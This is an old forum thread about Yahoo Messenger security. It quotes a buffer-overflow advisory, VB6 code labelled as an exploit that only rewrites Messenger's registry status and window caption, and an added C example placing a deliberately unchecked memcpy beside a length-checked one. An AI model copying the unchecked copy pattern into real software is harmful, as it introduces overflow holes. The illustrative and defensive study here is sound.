tansqrx
Apr 25 2005, 09:21 PM
Here's the question. Do you know of any exploits in Yahoo Messenger? The reason that I am asking is I have done quite a bit of research into the security of Messenger over the last 6 months. Actually the reason that I am trying to get web space is to publish some of my findings. I have mapped many of the Yahoo protocol packets and researched several common booters. Once I have the space I will dish out all the details. Do I have any similar Yahoo Messenger enthusiasts around that might be willing to discuss Messenger security?
Reply
saxsux
Apr 26 2005, 06:59 AM
I don't use Yahoo Messenger much; Google offers a much better alternative - Hello! www.hello.com
Reply
tansqrx
Apr 28 2005, 07:40 PM
Google? I'm talking about Yahoo Messenger, not the search engine.
Reply
tansqrx
Apr 28 2005, 07:45 PM
Looks like I may have dug up something on my own. I searched the Full Disclosure Mailing list and found an entry at Security Focus.

Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability
http://www.securityfocus.com/bid/12750

QUOTE
It has been reported that a remote buffer overflow vulnerability affects Yahoo! Messenger. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers.
It is likely that the attacker must be in the contact list of an unsuspecting user to exploit this issue. It should be noted that the details surrounding this issue are not clear; this BID will be updated as more details are released.
An attacker may leverage this issue to execute arbitrary code in the context of an unsuspecting user running a vulnerable version of the affected application.

QUOTE
bugtraq id: 12750
object class: Boundary Condition Error
cve: CVE-MAP-NOMATCH
remote: Yes
local: No
published: Mar 08, 2005
updated: Mar 08, 2005
vulnerable:
Yahoo! Messenger 4.0
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows XP Home
Yahoo! Messenger 5.0 .1232
Yahoo! Messenger 5.0 .1065
Yahoo! Messenger 5.0 .1046
Yahoo! Messenger 5.0
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0 SP1
- Microsoft Windows NT Workstation 4.0 SP2
- Microsoft Windows NT Workstation 4.0 SP3
- Microsoft Windows NT Workstation 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows XP Home
Yahoo! Messenger 5.5 .1249
Yahoo! Messenger 5.5
Yahoo! Messenger 5.6 .0.1358
Yahoo! Messenger 5.6 .0.1356
Yahoo! Messenger 5.6 .0.1355
Yahoo! Messenger 5.6 .0.1351
Yahoo! Messenger 5.6 .0.1347
Yahoo! Messenger 5.6
Yahoo! Messenger 6.0 .0.1921
Yahoo! Messenger 6.0 .0.1750
Yahoo! Messenger 6.0 .0.1643
Yahoo! Messenger 6.0
not vulnerable:

Does anyone have additional info on this exploit? Is it still valid?
Reply
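Added example, not part of the thread, the advisory, or Yahoo's code: the bug class the advisory names ("failure to securely copy user-supplied input into finite process buffers") shown as an unchecked copy beside a length-validated one. The struct, function names and the 64-byte buffer size are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

#define STATUS_MAX 64              /* assumed size of the fixed buffer */

struct contact {
    char status[STATUS_MAX];       /* finite process buffer */
    int  online;                   /* adjacent state an overflow would clobber */
};

/* Flawed pattern: trusts the sender's length, so len > STATUS_MAX - 1
 * writes past status[] into whatever follows it. */
void set_status_unchecked(struct contact *c, const char *src, size_t len)
{
    memcpy(c->status, src, len);
    c->status[len] = '\0';
}

/* Hardened form: refuse oversized or malformed input before copying.
 * Returns 0 on success, -1 if the input was refused (buffer untouched). */
int set_status_checked(struct contact *c, const char *src, size_t len)
{
    if (c == NULL || src == NULL)
        return -1;
    if (len >= sizeof c->status)          /* keep room for the terminator */
        return -1;
    if (memchr(src, '\0', len) != NULL)   /* embedded NUL: declared length lies */
        return -1;
    memcpy(c->status, src, len);
    c->status[len] = '\0';
    return 0;
}

/* Constructed demo: an in-range status is stored, an oversized one is refused. */
int demo(void)
{
    struct contact c = { "away", 1 };
    char big[STATUS_MAX * 4];
    memset(big, 'A', sizeof big);

    if (set_status_checked(&c, "at lunch", 8) != 0) return 1;
    if (strcmp(c.status, "at lunch") != 0) return 2;
    if (set_status_checked(&c, big, sizeof big) != -1) return 3;
    if (strcmp(c.status, "at lunch") != 0 || c.online != 1) return 4;
    return 0;
}

int main(void) { return demo(); }
```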
tansqrx
Apr 28 2005, 07:54 PM
This is a quick reply but I have some code questions. After downloading the exploit code from Security Focus I am left with more questions than answers. Below is the code snippet. I know that most exploits are published with lines missing or something important changed to keep the script kiddies from using the exploit. My problem is that this is VB 6 code and I am out of my element on this one. Could someone look at the code and see if it makes sense to them?

CODE
' Win32 API declarations (user32, shell32, winmm, advapi32, kernel32)
Public Declare Function EnableWindow Lib "user32" (ByVal hwnd As Long, ByVal fEnable As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Public Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Public Declare Function SendMessageLong& Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long)
Public Declare Function SendMessageByString Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As String) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function PlaySoundData Lib "winmm.dll" Alias "PlaySoundA" (lpData As Any, ByVal hModule As Long, ByVal dwFlags As Long) As Long
Public Declare Function ReleaseCapture Lib "user32" () As Long
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare Function MoveWindow Lib "user32" (ByVal hwnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
Private Declare Function GetWindowLong Lib "user32" Alias "GetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long) As Long
Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" (ByVal hwnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Declare Sub CopyMemory Lib "Kernel32" Alias "RtlMoveMemory" (pDest As Any, pSrc As Any, ByVal ByteLen As Long)
Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal X As Long, ByVal Y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

' Window message and control constants
Public Const BM_SETCHECK = &HF1
Public Const BM_GETCHECK = &HF0
Public Const CB_GETCOUNT = &H146
Public Const CB_GETLBTEXT = &H148
Public Const CB_SETCURSEL = &H14E
Public Const GW_HWNDFIRST = 0
Public Const GW_HWNDNEXT = 2
Public Const GW_CHILD = 5
Public Const LB_GETCOUNT = &H18B
Public Const LB_GETTEXT = &H189
Public Const LB_SETCURSEL = &H186
Public Const SW_HIDE = 0
Public Const SW_MAXIMIZE = 3
Public Const SW_MINIMIZE = 6
Public Const SW_NORMAL = 1
Public Const SW_SHOW = 5
Public Const VK_SPACE = &H20
Public Const WM_CHAR = &H102
Public Const WM_CLOSE = &H10
Public Const WM_COMMAND = &H111
Public Const WM_GETTEXT = &HD
Public Const WM_GETTEXTLENGTH = &HE
Public Const WM_KEYDOWN = &H100
Public Const WM_KEYUP = &H101
Public Const WM_LBUTTONDBLCLK = &H203
Public Const WM_LBUTTONDOWN = &H201
Public Const WM_LBUTTONUP = &H202
Public Const WM_MOVE = &HF012
Public Const WM_RBUTTONDOWN = &H204
Public Const WM_RBUTTONUP = &H205
Public Const WM_SETTEXT = &HC
Public Const WM_SYSCOMMAND = &H112

' Registry constants
Const ERROR_SUCCESS = 0&
Const REG_SZ = 1
Const REG_DWORD = 4

Public Enum HKeyTypes
    HKEY_CLASSES_ROOT = &H80000000
    HKEY_CURRENT_USER = &H80000001
    HKEY_LOCAL_MACHINE = &H80000002
    HKEY_USERS = &H80000003
    HKEY_PERFORMANCE_DATA = &H80000004
End Enum

' Writes Status into value "1" under the current profile's "Custom Msgs" key,
' then sends WM_COMMAND (&H111) to the main Messenger window.
Sub YStatus(Status As String)
    Dim Name As String
    Name = GetString(HKEY_CURRENT_USER, "Software\Yahoo\Pager", "Yahoo! user id")
    Call SaveString(HKEY_CURRENT_USER, "Software\Yahoo\Pager\profiles\" + Name + "\Custom Msgs", 1, Status)
    Dim X As Long
    On Error Resume Next
    X = FindWindow("YahooBuddyMain", vbNullString)
    SendMessageLong X, &H111, 388, 1&
End Sub

' Sets the caption of the main Messenger window.
Sub YCap(cap As String)
    Dim yahoobuddymain As Long
    yahoobuddymain = FindWindow("yahoobuddymain", vbNullString)
    Call SendMessageByString(yahoobuddymain, WM_SETTEXT, 0&, cap)
End Sub

' Reads a REG_SZ value: the first query gets the size, the second fills the buffer.
Public Function GetString(hKey As HKeyTypes, strPath As String, strValue As String)
    Dim keyhand As Long
    Dim datatype As Long
    Dim lResult As Long
    Dim strBuf As String
    Dim lDataBufSize As Long
    Dim intZeroPos As Integer
    Dim lValueType As Long
    r = RegOpenKey(hKey, strPath, keyhand)
    lResult = RegQueryValueEx(keyhand, strValue, 0&, lValueType, ByVal 0&, lDataBufSize)
    If lValueType = REG_SZ Then
        strBuf = String(lDataBufSize, " ")
        lResult = RegQueryValueEx(keyhand, strValue, 0&, 0&, ByVal strBuf, lDataBufSize)
        If lResult = ERROR_SUCCESS Then
            intZeroPos = InStr(strBuf, Chr$(0))
            If intZeroPos > 0 Then
                GetString = Left$(strBuf, intZeroPos - 1)
            Else
                GetString = strBuf
            End If
        End If
    End If
End Function

' Writes a REG_SZ value, creating the key if it does not exist.
Public Sub SaveString(hKey As HKeyTypes, strPath As String, strValue As String, strData As String)
    Dim keyhand As Long
    Dim r As Long
    r = RegCreateKey(hKey, strPath, keyhand)
    r = RegSetValueEx(keyhand, strValue, 0, REG_SZ, ByVal strData, Len(strData))
    r = RegCloseKey(keyhand)
End Sub
Reply